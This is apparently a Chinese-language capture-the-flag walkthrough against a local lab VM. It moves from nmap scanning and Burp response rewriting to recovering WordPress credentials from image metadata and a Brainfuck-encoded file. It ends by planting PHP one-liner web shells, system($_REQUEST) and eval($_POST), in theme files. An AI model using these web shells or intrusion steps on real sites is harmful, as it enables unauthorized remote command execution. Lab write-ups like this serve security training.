1. 信息收集:
- 主机扫描:
nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:7B:60:D8'
- 端口扫描22.80······
- 目录扫描,
- 操作系统等敏感信息
2. 漏洞扫描:
2.1. 进入主页面,常规点击页面功能点,无可利用点;
2.2. 尝试拼接目录扫描结果常规可利用的路径,虽然存在/wordpress页面,但是未渲染;
尝试利用唯一的搜索框,查看是否有可利用的功能点
发现IP地址转换为了localhost域名,但是域名无法正常解析利用
尝试将ip与对应的域名加入至本地hosts文件
还是无法正常渲染
尝试利用burp修改【response header】、【response body】;
同理 修改response body
打开浏览器代理,使得流量通过burp,尝试连接,页面已被渲染
2.3. 拼接目录扫描的/wordpress/wp-login.php
进入登录页面,尝试爆破,无果;
2.4. 拼接目录扫描的/img
发现存在一个flaghost.png,将其下载
利用kali的strings命令与exiftool工具查询flaghost.png中的关键字-》发现存在passw@45字符串-》尝试使用web:passw@45进行登录-》无果
strings flaghost.png | less
apt-get install exiftool
exiftool flaghost.png
2.5. 尝试拼接/passw@45
发现存在两个txt文件,查看发flag2.txt文件-》进入flag2.txt文件,发现存在加密信息
使用以下站点或者其他【brainfuck】解密网站、软件进行解密-》得到账号密码web:Hacker@4514
到wordpress后台登录-》成功登录
https://www.dcode.fr/brainfuck-language
http://www.hiencode.com/brain.html
2.6. 进入后台后查看当前用户为超级管理员
通过写主题拿Webshell,点击Appearance
-->Theme Editor
-->header.php
写入一句话木马-》保存通过首页进行访问
<?php system($_REQUEST['kucei']);?> //写入木马
http://192.168.7.79/wordpress/?kucei=whoami //木马利用姿势
2.7. 写入一句话木马,尝试蚁剑连接
eval($_POST['kucei']);
phpinfo();
http://ip/wordpress/wp-content/themes/twentynineteen/404.php